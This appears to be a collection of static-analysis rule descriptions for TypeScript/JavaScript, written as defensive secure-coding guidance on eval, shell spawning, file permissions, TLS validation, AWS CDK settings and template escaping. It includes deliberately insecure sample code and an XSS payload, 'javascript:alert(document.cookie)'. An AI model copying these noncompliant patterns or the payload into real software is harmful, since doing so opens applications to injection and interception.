
This rule is deprecated; use S4507 instead.

Why is this an issue?

The debugger statement can be placed anywhere in a procedure to suspend execution; using it is similar to setting a breakpoint in the code. Such statements must be removed from production source code to prevent unexpected behavior and to avoid exposing the application to attacks.

Noncompliant code example

for (let i = 1; i < 5; i++) {
  // Print i to the Output window.
  Debug.write("loop index is " + i);
  // Wait for user to resume.
  debugger;
}

Compliant solution

for (let i = 1; i < 5; i++) {
  // Print i to the Output window.
  Debug.write("loop index is " + i);
}

Resources

typescript:S2612

In Unix file system permissions, the "others" category refers to all users except the owner of the file system resource and the members of the group assigned to this resource.

Granting permissions to this category can lead to unintended access to files or directories that could allow attackers to obtain sensitive information, disrupt services or elevate privileges.

Ask Yourself Whether

  • The application is designed to be run on a multi-user environment.
  • Corresponding files and directories may contain confidential information.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

The most restrictive possible permissions should be assigned to files and directories.

Sensitive Code Example

Node.js fs

const fs = require('fs');

fs.chmodSync("/tmp/fs", 0o777); // Sensitive

const fs = require('fs');
const fsPromises = fs.promises;

fsPromises.chmod("/tmp/fsPromises", 0o777); // Sensitive

const fs = require('fs');
const fsPromises = fs.promises;

async function fileHandler() {
  let filehandle;
  try {
    filehandle = await fsPromises.open('/tmp/fsPromises', 'r');
    await filehandle.chmod(0o777); // Sensitive
  } finally {
    if (filehandle !== undefined)
      await filehandle.close();
  }
}

Node.js process.umask

const process = require('process');

process.umask(0o000); // Sensitive

Compliant Solution

Node.js fs

const fs = require('fs');

fs.chmodSync("/tmp/fs", 0o770); // Compliant

const fs = require('fs');
const fsPromises = fs.promises;

fsPromises.chmod("/tmp/fsPromises", 0o770); // Compliant

const fs = require('fs');
const fsPromises = fs.promises;

async function fileHandler() {
  let filehandle;
  try {
    filehandle = await fsPromises.open('/tmp/fsPromises', 'r');
    await filehandle.chmod(0o770); // Compliant
  } finally {
    if (filehandle !== undefined)
      await filehandle.close();
  }
}

Node.js process.umask

const process = require('process');

process.umask(0o007); // Compliant

See

typescript:S1523

Executing code dynamically is security-sensitive and has led to vulnerabilities in the past.

Some APIs enable the execution of dynamic code by providing it as strings at runtime. These APIs might be useful in some very specific meta-programming use-cases. However, most of the time their use is frowned upon because they also increase the risk of injected code. Such attacks can run either on the server or in the client (example: an XSS attack) and have a huge impact on an application’s security.

This rule raises issues on calls to eval and the Function constructor. This rule does not detect code injections; it only highlights the use of APIs which should be used sparingly and very carefully. The goal is to guide security code reviews.

The rule also flags string literals starting with javascript: as the code passed in javascript: URLs is evaluated the same way as calls to eval or Function constructor.

Ask Yourself Whether

  • the executed code may come from an untrusted source and hasn’t been sanitized.
  • you really need to run code dynamically.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Regarding the execution of unknown code, the best solution is to not run code provided by an untrusted source. If you really need to do it, run the code in a sandboxed environment. Use jails, firewalls and whatever means your operating system and programming language provide (examples: Security Managers in Java, iframes and the same-origin policy for JavaScript in a web browser).

Do not try to create a blacklist of dangerous code. It is impossible to cover all attacks that way.

Avoid using dynamic code APIs whenever possible. Hard-coded code is always safer.

Sensitive Code Example

let value = eval('obj.' + propName); // Sensitive
let func = Function('obj' + propName); // Sensitive
location.href = 'javascript:void(0)'; // Sensitive
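Dynamic property access is the most common reason for reaching for eval in examples like the one above, and it can usually be done with bracket notation instead, which looks the property up by name without ever interpreting the string as code. A minimal sketch; the object and property names are illustrative:

```javascript
// Hypothetical example: dynamic property access without eval.
// Bracket notation resolves the property name at runtime but never
// evaluates the string as code, so no code injection is possible.
const obj = { name: 'report', size: 42 };

function getProp(target, propName) {
  return target[propName]; // Compliant: no dynamic code execution
}

console.log(getProp(obj, 'size')); // 42
```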

Exceptions

This rule will not raise an issue when the argument of the eval or Function is a literal string as it is reasonably safe.

See

typescript:S4721

Arbitrary OS command injection vulnerabilities are more likely when a shell is spawned rather than a new process; shell meta-characters can then be used (when parameters are user-controlled, for instance) to inject OS commands.

Ask Yourself Whether

  • OS command name or parameters are user-controlled.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

Use functions that don’t spawn a shell.

Sensitive Code Example

const cp = require('child_process');

// A shell will be spawn in these following cases:
cp.exec(cmd); // Sensitive
cp.execSync(cmd); // Sensitive

cp.spawn(cmd, { shell: true }); // Sensitive
cp.spawnSync(cmd, { shell: true }); // Sensitive
cp.execFile(cmd, { shell: true }); // Sensitive
cp.execFileSync(cmd, { shell: true }); // Sensitive

Compliant Solution

const cp = require('child_process');

cp.spawnSync("/usr/bin/file.exe", { shell: false }); // Compliant

See

typescript:S5148

A newly opened window having access back to the originating window could allow basic phishing attacks (the window.opener object is not null and thus window.opener.location can be set to a malicious website by the opened page).

For instance, an attacker can put a link (say: "http://example.com/mylink") on a popular website that changes, when opened, the original page to "http://example.com/fake_login". On "http://example.com/fake_login" there is a fake login page which could trick real users to enter their credentials.

Ask Yourself Whether

  • The application opens untrusted external URLs.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

Use noopener to prevent untrusted pages from abusing window.opener.

Note: In Chrome 88+, Firefox 79+ or Safari 12.1+, target=_blank on anchors implies rel=noopener, which makes the protection enabled by default.

Sensitive Code Example

window.open("https://example.com/dangerous");

Compliant Solution

window.open("https://example.com/dangerous", "WindowName", "noopener");
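For legacy browsers that ignore the noopener feature, the opener reference can additionally be cleared by hand after opening the window. A browser-side sketch; the window object is passed as a parameter here only so the logic can be exercised outside a browser:

```javascript
// Open a window and defensively sever the reverse link to the opener.
function openWithoutOpener(win, url) {
  const popup = win.open(url, '_blank', 'noopener');
  if (popup) {
    popup.opener = null; // belt and braces for browsers ignoring "noopener"
  }
  return popup;
}
```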

See

typescript:S1313

Hardcoding IP addresses is security-sensitive. It has led in the past to the following vulnerabilities:

Today’s services have an ever-changing architecture due to their scaling and redundancy needs. It is a mistake to think that a service will always have the same IP address. When it does change, the hardcoded IP will have to be modified too. This will have an impact on the product development, delivery, and deployment:

  • The developers will have to do a rapid fix every time this happens, instead of having an operation team change a configuration file.
  • It invites mistakenly using the same address in every environment (dev, sys, qa, prod).

Last but not least, it has an effect on application security. Attackers might be able to decompile the code and thereby discover a potentially sensitive address. They can perform a Denial of Service attack on the service, try to get access to the system, or try to spoof the IP address to bypass security checks. Such attacks are always possible, but in the case of a hardcoded IP address, solving the issue will take more time, which increases an attack’s impact.

Ask Yourself Whether

The disclosed IP address is sensitive, e.g.:

  • Can give information to an attacker about the network topology.
  • It’s a personal (assigned to an identifiable person) IP address.

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

Don’t hard-code the IP address in the source code; instead, make it configurable with environment variables, configuration files, or a similar approach. Alternatively, if confidentiality is not required, a domain name can be used, since it allows changing the destination quickly without having to rebuild the software.

Sensitive Code Example

ip = "192.168.12.42"; // Sensitive

const net = require('net');
var client = new net.Socket();
client.connect(80, ip, function() {
  // ...
});

Compliant Solution

ip = process.env.IP_ADDRESS; // Compliant

const net = require('net');
var client = new net.Socket();
client.connect(80, ip, function() {
  // ...
});

Exceptions

No issue is reported for the following cases because they are not considered sensitive:

  • Loopback addresses 127.0.0.0/8 in CIDR notation (from 127.0.0.0 to 127.255.255.255)
  • Broadcast address 255.255.255.255
  • Non routable address 0.0.0.0
  • Strings of the form 2.5.<number>.<number> as they often match Object Identifiers (OID).
  • Addresses in the ranges 192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24, reserved for documentation purposes by RFC 5737
  • Addresses in the 2001:db8::/32 range, reserved for documentation purposes by RFC 3849

See

typescript:S6327

Amazon Simple Notification Service (SNS) is a managed messaging service for application-to-application (A2A) and application-to-person (A2P) communication. SNS topics allow publisher systems to fan out messages to a large number of subscriber systems. Amazon SNS can encrypt messages as soon as they are received. If adversaries gain physical access to the storage medium or otherwise leak a message, they are not able to access the data.

Ask Yourself Whether

  • The topic contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to encrypt SNS topics that contain sensitive information. Encryption and decryption are handled transparently by SNS, so no further modifications to the application are necessary.

Sensitive Code Example

For aws_cdk.aws_sns.Topic

import { Topic } from 'aws-cdk-lib/aws-sns';

new Topic(this, 'exampleTopic'); // Sensitive

For aws_cdk.aws_sns.CfnTopic

import { CfnTopic } from 'aws-cdk-lib/aws-sns';

new CfnTopic(this, 'exampleCfnTopic'); // Sensitive

Compliant Solution

For aws_cdk.aws_sns.Topic

import { Topic } from 'aws-cdk-lib/aws-sns';
import { Key } from 'aws-cdk-lib/aws-kms';

const encryptionKey = new Key(this, 'exampleKey', {
    enableKeyRotation: true,
});

new Topic(this, 'exampleTopic', {
    masterKey: encryptionKey
});

For aws_cdk.aws_sns.CfnTopic

import { CfnTopic } from 'aws-cdk-lib/aws-sns';
import { Key } from 'aws-cdk-lib/aws-kms';

const encryptionKey = new Key(this, 'exampleKey', {
    enableKeyRotation: true,
});

cfnTopic = new CfnTopic(this, 'exampleCfnTopic', {
    kmsMasterKeyId: encryptionKey.keyId
});

See

typescript:S6329

Enabling public network access to cloud resources can affect an organization’s ability to protect its data or internal operations from data theft or disruption.

Depending on the component, inbound access from the Internet can be enabled via:

  • a boolean value that explicitly allows access to the public network.
  • the assignment of a public IP address.
  • database firewall rules that allow public IP ranges.

Deciding to allow public access may happen for various reasons such as for quick maintenance, time saving, or by accident.

This decision increases the likelihood of attacks on the organization, such as:

  • data breaches.
  • intrusions into the infrastructure to permanently steal from it.
  • and various malicious traffic, such as DDoS attacks.

Ask Yourself Whether

This cloud resource:

  • should be publicly accessible to any Internet user.
  • requires inbound traffic from the Internet to function properly.

There is a risk if you answered no to any of those questions.

Recommended Secure Coding Practices

Avoid publishing cloud services on the Internet unless they are intended to be publicly accessible, such as customer portals or e-commerce sites.

Use private networks (and associated private IP addresses) and VPC peering or other secure communication tunnels to communicate with other cloud components.

The goal is to prevent the component from intercepting traffic coming in via the public IP address. If the cloud resource does not support the absence of a public IP address, assign a public IP address to it, but do not create listeners for the public IP address.

Sensitive Code Example

For aws-cdk-lib.aws_ec2.Instance and similar constructs:

import {aws_ec2 as ec2} from 'aws-cdk-lib'

new ec2.Instance(this, "example", {
    instanceType: nanoT2,
    machineImage: ec2.MachineImage.latestAmazonLinux(),
    vpc: vpc,
    vpcSubnets: {subnetType: ec2.SubnetType.PUBLIC} // Sensitive
})

For aws-cdk-lib.aws_ec2.CfnInstance:

import {aws_ec2 as ec2} from 'aws-cdk-lib'

new ec2.CfnInstance(this, "example", {
    instanceType: "t2.micro",
    imageId: "ami-0ea0f26a6d50850c5",
    networkInterfaces: [
        {
            deviceIndex: "0",
            associatePublicIpAddress: true, // Sensitive
            deleteOnTermination: true,
            subnetId: vpc.selectSubnets({subnetType: ec2.SubnetType.PUBLIC}).subnetIds[0]
        }
    ]
})

For aws-cdk-lib.aws_dms.CfnReplicationInstance:

import {aws_dms as dms} from 'aws-cdk-lib'

new dms.CfnReplicationInstance(
    this, "example", {
    replicationInstanceClass: "dms.t2.micro",
    allocatedStorage: 5,
    publiclyAccessible: true, // Sensitive
    replicationSubnetGroupIdentifier: subnetGroup.replicationSubnetGroupIdentifier,
    vpcSecurityGroupIds: [vpc.vpcDefaultSecurityGroup]
})

For aws-cdk-lib.aws_rds.CfnDBInstance:

import {aws_ec2 as ec2, aws_rds as rds} from 'aws-cdk-lib'

const rdsSubnetGroupPublic = new rds.CfnDBSubnetGroup(this, "publicSubnet", {
    dbSubnetGroupDescription: "Subnets",
    dbSubnetGroupName: "publicSn",
    subnetIds: vpc.selectSubnets({
        subnetType: ec2.SubnetType.PUBLIC
    }).subnetIds
})

new rds.CfnDBInstance(this, "example", {
    engine: "postgres",
    masterUsername: "foobar",
    masterUserPassword: "12345678",
    dbInstanceClass: "db.r5.large",
    allocatedStorage: "200",
    iops: 1000,
    dbSubnetGroupName: rdsSubnetGroupPublic.ref,
    publiclyAccessible: true, // Sensitive
    vpcSecurityGroups: [sg.securityGroupId]
})

Compliant Solution

For aws-cdk-lib.aws_ec2.Instance and similar constructs:

import {aws_ec2 as ec2} from 'aws-cdk-lib'

new ec2.Instance(
    this,
    "example", {
    instanceType: nanoT2,
    machineImage: ec2.MachineImage.latestAmazonLinux(),
    vpc: vpc,
    vpcSubnets: {subnetType: ec2.SubnetType.PRIVATE_WITH_EGRESS}
})

For aws-cdk-lib.aws_ec2.CfnInstance:

import {aws_ec2 as ec2} from 'aws-cdk-lib'

new ec2.CfnInstance(this, "example", {
    instanceType: "t2.micro",
    imageId: "ami-0ea0f26a6d50850c5",
    networkInterfaces: [
        {
            deviceIndex: "0",
            associatePublicIpAddress: false,
            deleteOnTermination: true,
            subnetId: vpc.selectSubnets({subnetType: ec2.SubnetType.PRIVATE_WITH_EGRESS}).subnetIds[0]
        }
    ]
})

For aws-cdk-lib.aws_dms.CfnReplicationInstance:

import {aws_dms as dms} from 'aws-cdk-lib'

new dms.CfnReplicationInstance(
    this, "example", {
    replicationInstanceClass: "dms.t2.micro",
    allocatedStorage: 5,
    publiclyAccessible: false,
    replicationSubnetGroupIdentifier: subnetGroup.replicationSubnetGroupIdentifier,
    vpcSecurityGroupIds: [vpc.vpcDefaultSecurityGroup]
})

For aws-cdk-lib.aws_rds.CfnDBInstance:

import {aws_ec2 as ec2, aws_rds as rds} from 'aws-cdk-lib'

const rdsSubnetGroupPrivate = new rds.CfnDBSubnetGroup(this, "example",{
    dbSubnetGroupDescription: "Subnets",
    dbSubnetGroupName: "privateSn",
    subnetIds: vpc.selectSubnets({
        subnetType: ec2.SubnetType.PRIVATE_WITH_EGRESS
    }).subnetIds
})

new rds.CfnDBInstance(this, "example", {
    engine: "postgres",
    masterUsername: "foobar",
    masterUserPassword: "12345678",
    dbInstanceClass: "db.r5.large",
    allocatedStorage: "200",
    iops: 1000,
    dbSubnetGroupName: rdsSubnetGroupPrivate.ref,
    publiclyAccessible: false,
    vpcSecurityGroups: [sg.securityGroupId]
})

See

typescript:S4829

This rule is deprecated, and will eventually be removed.

Reading Standard Input is security-sensitive. It has led in the past to the following vulnerabilities:

It is common for attackers to craft inputs enabling them to exploit software vulnerabilities. Thus any data read from the standard input (stdin) can be dangerous and should be validated.

This rule flags code that reads from the standard input.

Ask Yourself Whether

  • data read from the standard input is not sanitized before being used.

You are at risk if you answered yes to this question.

Recommended Secure Coding Practices

Sanitize all data read from the standard input before using it.
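One way to do that is allowlist validation before the data is used; the accepted pattern below (short tokens of word characters and dashes) is an illustrative policy, not part of the rule:

```javascript
// Reject any stdin chunk that does not match a strict allowlist.
function sanitizeInput(chunk) {
  const value = String(chunk).trim();
  if (!/^[\w-]{1,64}$/.test(value)) {
    throw new Error('Rejected input: unexpected characters or length');
  }
  return value;
}

console.log(sanitizeInput('build-42\n')); // accepted and trimmed
```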

Sensitive Code Example

// The process object is a global that provides information about, and control over, the current Node.js process
// All uses of process.stdin are security-sensitive and should be reviewed

process.stdin.on('readable', () => {
	const chunk = process.stdin.read(); // Sensitive
	if (chunk !== null) {
		dosomething(chunk);
	}
});

const readline = require('readline');
readline.createInterface({
	input: process.stdin // Sensitive
}).on('line', (input) => {
	dosomething(input);
});

See

typescript:S4823

This rule is deprecated, and will eventually be removed.

Using command line arguments is security-sensitive. It has led in the past to the following vulnerabilities:

Command line arguments can be dangerous just like any other user input. They should never be used without being first validated and sanitized.

Remember also that any user can retrieve the list of processes running on a system, which makes the arguments provided to them visible. Thus passing sensitive information via command line arguments should be considered insecure.

This rule raises an issue at every program entry point (main method) where command line arguments are used. The goal is to guide security code reviews.

Ask Yourself Whether

  • any of the command line arguments are used without being sanitized first.
  • your application accepts sensitive information via command line arguments.

If you answered yes to any of these questions you are at risk.

Recommended Secure Coding Practices

Sanitize all command line arguments before using them.

Any user or application can list running processes and see the command line arguments they were started with. There are safer ways of providing sensitive information to an application than exposing it on the command line. It is common to write it to the process' standard input, or to give the path to a file containing the information.

Sensitive Code Example

// The process object is a global that provides information about, and control over, the current Node.js process
var param = process.argv[2]; // Sensitive: check how the argument is used
console.log('Param: ' + param);

See

typescript:S6321

Why is this an issue?

Cloud platforms such as AWS, Azure, or GCP support virtual firewalls that can be used to restrict access to services by controlling inbound and outbound traffic.
Any firewall rule allowing traffic from all IP addresses to standard network ports on which administration services traditionally listen, such as 22 for SSH, can expose these services to exploits and unauthorized access.

What is the potential impact?

Like any other service, administration services can contain vulnerabilities. Administration services run with elevated privileges and thus a vulnerability could have a high impact on the system.

Additionally, credentials might be leaked through phishing or similar techniques. Attackers who are able to reach the services could use the credentials to log in to the system.

How to fix it

It is recommended to restrict access to remote administration services to only trusted IP addresses. In practice, trusted IP addresses are those held by system administrators or those of bastion-like servers.

Code examples

Noncompliant code example

For aws-cdk-lib.aws_ec2.Instance and other constructs that support a connections attribute:

import {aws_ec2 as ec2} from 'aws-cdk-lib'

const instance = new ec2.Instance(this, "default-own-security-group",{
    instanceType: nanoT2,
    machineImage: ec2.MachineImage.latestAmazonLinux(),
    vpc: vpc,
    instanceName: "test-instance"
})

instance.connections.allowFrom(
    ec2.Peer.anyIpv4(), // Noncompliant
    ec2.Port.tcp(22),
    /*description*/ "Allows SSH from all IPv4"
)

For aws-cdk-lib.aws_ec2.SecurityGroup

import {aws_ec2 as ec2} from 'aws-cdk-lib'

const securityGroup = new ec2.SecurityGroup(this, "custom-security-group", {
    vpc: vpc
})

securityGroup.addIngressRule(
    ec2.Peer.anyIpv4(), // Noncompliant
    ec2.Port.tcpRange(1, 1024)
)

For aws-cdk-lib.aws_ec2.CfnSecurityGroup

import {aws_ec2 as ec2} from 'aws-cdk-lib'

new ec2.CfnSecurityGroup(
    this,
    "cfn-based-security-group", {
        groupDescription: "cfn based security group",
        groupName: "cfn-based-security-group",
        vpcId: vpc.vpcId,
        securityGroupIngress: [
            {
                ipProtocol: "6",
                cidrIp: "0.0.0.0/0", // Noncompliant
                fromPort: 22,
                toPort: 22
            }
        ]
    }
)

For aws-cdk-lib.aws_ec2.CfnSecurityGroupIngress

import {aws_ec2 as ec2} from 'aws-cdk-lib'

new ec2.CfnSecurityGroupIngress( // Noncompliant
    this,
    "ingress-all-ip-tcp-ssh", {
        ipProtocol: "tcp",
        cidrIp: "0.0.0.0/0",
        fromPort: 22,
        toPort: 22,
        groupId: securityGroup.attrGroupId
})

Compliant solution

For aws-cdk-lib.aws_ec2.Instance and other constructs that support a connections attribute:

import {aws_ec2 as ec2} from 'aws-cdk-lib'

const instance = new ec2.Instance(this, "default-own-security-group",{
    instanceType: nanoT2,
    machineImage: ec2.MachineImage.latestAmazonLinux(),
    vpc: vpc,
    instanceName: "test-instance"
})

instance.connections.allowFrom(
    ec2.Peer.ipv4("192.0.2.0/24"),
    ec2.Port.tcp(22),
    /*description*/ "Allows SSH from a trusted range"
)

For aws-cdk-lib.aws_ec2.SecurityGroup

import {aws_ec2 as ec2} from 'aws-cdk-lib'

const securityGroup3 = new ec2.SecurityGroup(this, "custom-security-group", {
    vpc: vpc
})

securityGroup3.addIngressRule(
    ec2.Peer.anyIpv4(),
    ec2.Port.tcpRange(1024, 1048)
)

For aws-cdk-lib.aws_ec2.CfnSecurityGroup

import {aws_ec2 as ec2} from 'aws-cdk-lib'

new ec2.CfnSecurityGroup(
    this,
    "cfn-based-security-group", {
        groupDescription: "cfn based security group",
        groupName: "cfn-based-security-group",
        vpcId: vpc.vpcId,
        securityGroupIngress: [
            {
                ipProtocol: "6",
                cidrIp: "192.0.2.0/24",
                fromPort: 22,
                toPort: 22
            }
        ]
    }
)

For aws-cdk-lib.aws_ec2.CfnSecurityGroupIngress

new ec2.CfnSecurityGroupIngress(
    this,
    "ingress-all-ipv4-tcp-http", {
        ipProtocol: "6",
        cidrIp: "0.0.0.0/0",
        fromPort: 80,
        toPort: 80,
        groupId: securityGroup.attrGroupId
    }
)

Resources

Documentation

Standards

typescript:S4830

This vulnerability makes it possible that an encrypted communication is intercepted.

Why is this an issue?

Transport Layer Security (TLS) provides secure communication between systems over the internet by encrypting the data sent between them. The role of certificate validation in this process is to ensure that a system is indeed the one it claims to be, adding an extra layer of trust and security.

When certificate validation is disabled, the client skips this critical check. This creates an opportunity for attackers to pose as a trusted entity and intercept, manipulate, or steal the data being transmitted.

What is the potential impact?

Establishing trust in a secure way is a non-trivial task. When you disable certificate validation, you are removing a key mechanism designed to build this trust in internet communication, opening your system up to a number of potential threats.

Identity spoofing

If a system does not validate certificates, it cannot confirm the identity of the other party involved in the communication. An attacker can exploit this by creating a fake server and masquerading it as a legitimate one. For example, they might set up a server that looks like your bank’s server, tricking your system into thinking it is communicating with the bank. This scenario, called identity spoofing, allows the attacker to collect any data your system sends to them, potentially leading to significant data breaches.

Loss of data integrity

When TLS certificate validation is disabled, the integrity of the data you send and receive cannot be guaranteed. An attacker could modify the data in transit, and you would have no way of knowing. This could range from subtle manipulations of the data you receive to the injection of malicious code or malware into your system. The consequences of such breaches of data integrity can be severe, depending on the nature of the data and the system.

How to fix it in Node.js

Code examples

The following code contains examples of disabled certificate validation.

Certificate validation is disabled by setting rejectUnauthorized to false. To enable validation, set the value to true, or do not set rejectUnauthorized at all so that the secure default value is used.

Noncompliant code example

const https = require('node:https');

let options = {
  hostname: 'www.example.com',
  port: 443,
  path: '/',
  method: 'GET',
  rejectUnauthorized: false,
  secureProtocol: 'TLSv1_2_method'
};

let req = https.request(options, (res) => {
  res.on('data', (d) => {
    process.stdout.write(d);
  });
}); // Noncompliant
const tls = require('node:tls');

let options = {
    rejectUnauthorized: false,
    secureProtocol: 'TLSv1_2_method'
};

let socket = tls.connect(443, "www.example.com", options, () => {
  process.stdin.pipe(socket);
  process.stdin.resume();
}); // Noncompliant

Compliant solution

const https = require('node:https');

let options = {
  hostname: 'www.example.com',
  port: 443,
  path: '/',
  method: 'GET',
  secureProtocol: 'TLSv1_2_method'
};

let req = https.request(options, (res) => {
  res.on('data', (d) => {
    process.stdout.write(d);
  });
});
const tls = require('node:tls');

let options = {
    secureProtocol: 'TLSv1_2_method'
};

let socket = tls.connect(443, "www.example.com", options, () => {
  process.stdin.pipe(socket);
  process.stdin.resume();
});

How does this work?

Addressing the vulnerability of disabled TLS certificate validation primarily involves re-enabling the default validation.

To avoid running into problems with invalid certificates, consider the following sections.

Using trusted certificates

If possible, always use a certificate issued by a well-known, trusted CA for your server. Most programming environments come with a predefined list of trusted root CAs, and certificates issued by these authorities are validated automatically. This is the best practice, and it requires no additional code or configuration.

Working with self-signed certificates or non-standard CAs

In some cases, you might need to work with a server using a self-signed certificate, or a certificate issued by a CA not included in your trusted roots. Rather than disabling certificate validation in your code, you can add the necessary certificates to your trust store.
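With Node.js, one way to do that is the `ca` option, which supplies the trust anchors for the connection while keeping validation enabled. A sketch under assumptions: the hostname is a placeholder, and caPem is the PEM-encoded CA certificate loaded by the caller. Note that `ca` replaces the default trust store for that connection rather than extending it.

```javascript
// Build TLS options that trust a specific internal CA for this connection
// without disabling certificate validation.
function tlsOptionsWithCa(caPem) {
  return {
    hostname: 'internal.example.com', // illustrative internal host
    port: 443,
    ca: [caPem], // PEM of the internal CA, supplied by the caller
    // rejectUnauthorized is deliberately left unset:
    // the secure default (true) applies
  };
}
```

For process-wide trust, the NODE_EXTRA_CA_CERTS environment variable extends (rather than replaces) the default root set.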

Resources

Standards

typescript:S4036

When executing an OS command, unless you specify the full path to the executable, the directories in your application’s PATH environment variable are searched for it. That search can leave an opening for an attacker if one of the directories in PATH is under their control.

Ask Yourself Whether

  • The directories in the PATH environment variable may be defined by untrusted entities.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

A fully qualified/absolute path should be used to specify the OS command to execute.

Sensitive Code Example

const cp = require('child_process');
cp.exec('file.exe'); // Sensitive

Compliant Solution

const cp = require('child_process');
cp.exec('/usr/bin/file.exe'); // Compliant

See

typescript:S6333

Creating APIs without authentication unnecessarily increases the attack surface on the target infrastructure.

Unless another authentication method is used, attackers have the opportunity to attempt attacks against the underlying API.
This means attacks both on the functionality provided by the API and its infrastructure.

Ask Yourself Whether

  • The underlying API exposes all of its contents to any anonymous Internet user.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

In general, prefer limiting API access to a specific set of people or entities.

AWS provides multiple methods to do so:

  • AWS_IAM, to use standard AWS IAM roles and policies.
  • COGNITO_USER_POOLS, to use customizable OpenID Connect (OIDC) identity providers (IdP).
  • CUSTOM, to use an AWS-independent OIDC provider, glued to the infrastructure with a Lambda authorizer.

Sensitive Code Example

For aws-cdk-lib.aws_apigateway.Resource:

import {aws_apigateway as apigateway} from "aws-cdk-lib"

const resource = api.root.addResource("example")
resource.addMethod(
    "GET",
    new apigateway.HttpIntegration("https://example.org"),
    {
        authorizationType: apigateway.AuthorizationType.NONE // Sensitive
    }
)

For aws-cdk-lib.aws_apigatewayv2.CfnRoute:

import {aws_apigatewayv2 as apigateway} from "aws-cdk-lib"

new apigateway.CfnRoute(this, "no-auth", {
    apiId: api.ref,
    routeKey: "GET /no-auth",
    authorizationType: "NONE", // Sensitive
    target: exampleIntegration
})

Compliant Solution

For aws-cdk-lib.aws_apigateway.Resource:

import {aws_apigateway as apigateway} from "aws-cdk-lib"

const resource = api.root.addResource("example",{
    defaultMethodOptions:{
        authorizationType: apigateway.AuthorizationType.IAM
    }
})
resource.addMethod(
    "POST",
    new apigateway.HttpIntegration("https://example.org"),
    {
        authorizationType: apigateway.AuthorizationType.IAM
    }
)
resource.addMethod(  // authorizationType is inherited from the Resource's configured defaultMethodOptions
    "GET"
)

For aws-cdk-lib.aws_apigatewayv2.CfnRoute:

import {aws_apigatewayv2 as apigateway} from "aws-cdk-lib"

new apigateway.CfnRoute(this, "auth", {
    apiId: api.ref,
    routeKey: "POST /auth",
    authorizationType: "AWS_IAM",
    target: exampleIntegration
})

See

typescript:S5247

To reduce the risk of cross-site scripting attacks, templating systems such as Twig, Django, Smarty, and Groovy's template engine allow configuration of automatic variable escaping before rendering templates. When escaping occurs, characters that make sense to the browser (e.g. <a>) are transformed/replaced with escaped/sanitized values (e.g. &lt;a&gt;).

Auto-escaping is not a magic feature that annihilates all cross-site scripting attacks; it depends on the strategy applied and the context. For example, an "HTML auto-escaping" strategy (which only transforms HTML characters into HTML entities) is not relevant when variables are used in an HTML attribute, because the ':' character is not escaped, and thus an attack such as the one below is possible:

<a href="{{ myLink }}">link</a> // myLink = javascript:alert(document.cookie)
<a href="javascript:alert(document.cookie)">link</a> // JS injection (XSS attack)

Ask Yourself Whether

  • Templates are used to render web content and
    • dynamic variables in templates come from untrusted locations or are user-controlled inputs
    • there is no local mechanism in place to sanitize or validate the inputs.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Enable auto-escaping by default and continue to review the use of inputs in order to be sure that the chosen auto-escaping strategy is the right one.

Sensitive Code Example

mustache.js template engine:

let Mustache = require("mustache");

Mustache.escape = function(text) {return text;}; // Sensitive

let rendered = Mustache.render(template, { name: inputName });

handlebars.js template engine:

const Handlebars = require('handlebars');

let source = "<p>attack {{name}}</p>";

let template = Handlebars.compile(source, { noEscape: true }); // Sensitive

markdown-it markup language parser:

const markdownIt = require('markdown-it');
let md = markdownIt({
  html: true // Sensitive
});

let result = md.render('# <b>attack</b>');

marked markup language parser:

const marked = require('marked');

marked.setOptions({
  renderer: new marked.Renderer(),
  sanitize: false // Sensitive
});

console.log(marked("# test <b>attack</b>"));

kramed markup language parser:

let kramed = require('kramed');

var options = {
  renderer: new kramed.Renderer({
    sanitize: false // Sensitive
  })
};

Compliant Solution

mustache.js template engine:

let Mustache = require("mustache");

let rendered = Mustache.render(template, { name: inputName }); // Compliant autoescaping is on by default

handlebars.js template engine:

const Handlebars = require('handlebars');

let source = "<p>attack {{name}}</p>";
let data = { "name": "<b>Alan</b>" };

let template = Handlebars.compile(source); // Compliant by default noEscape is set to false

markdown-it markup language parser:

let md = require('markdown-it')(); // Compliant by default html is set to false

let result = md.render('# <b>attack</b>');

marked markup language parser:

const marked = require('marked');

marked.setOptions({
  renderer: new marked.Renderer()
}); // Compliant by default sanitize is set to true

console.log(marked("# test <b>attack</b>"));

kramed markup language parser:

let kramed = require('kramed');

let options = {
  renderer: new kramed.Renderer({
    sanitize: true // Compliant
  })
};

console.log(kramed('Attack [xss?](javascript:alert("xss")).', options));

See

typescript:S6330

Amazon Simple Queue Service (SQS) is a managed message queuing service for application-to-application (A2A) communication. Amazon SQS can store messages encrypted as soon as they are received. If adversaries gain physical access to the storage medium or otherwise leak a message from the file system, for example through a vulnerability in the service, they are not able to access the data.

Ask Yourself Whether

  • The queue contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to encrypt SQS queues that contain sensitive information. Encryption and decryption are handled transparently by SQS, so no further modifications to the application are necessary.

Sensitive Code Example

For aws-cdk-lib.aws-sqs.Queue

import { Queue } from 'aws-cdk-lib/aws-sqs';

new Queue(this, 'example'); // Sensitive

For aws-cdk-lib.aws-sqs.CfnQueue

import { CfnQueue } from 'aws-cdk-lib/aws-sqs';

new CfnQueue(this, 'example'); // Sensitive

Compliant Solution

For aws-cdk-lib.aws-sqs.Queue

import { Queue, QueueEncryption } from 'aws-cdk-lib/aws-sqs';

new Queue(this, 'example', {
    encryption: QueueEncryption.KMS_MANAGED
});

For aws-cdk-lib.aws-sqs.CfnQueue

import { CfnQueue } from 'aws-cdk-lib/aws-sqs';
import { Key } from 'aws-cdk-lib/aws-kms';

const encryptionKey = new Key(this, 'example', {
    enableKeyRotation: true,
});

new CfnQueue(this, 'example', {
    kmsMasterKeyId: encryptionKey.keyId
});

See

typescript:S5122

Having a permissive Cross-Origin Resource Sharing policy is security-sensitive. It has led in the past to the following vulnerabilities:

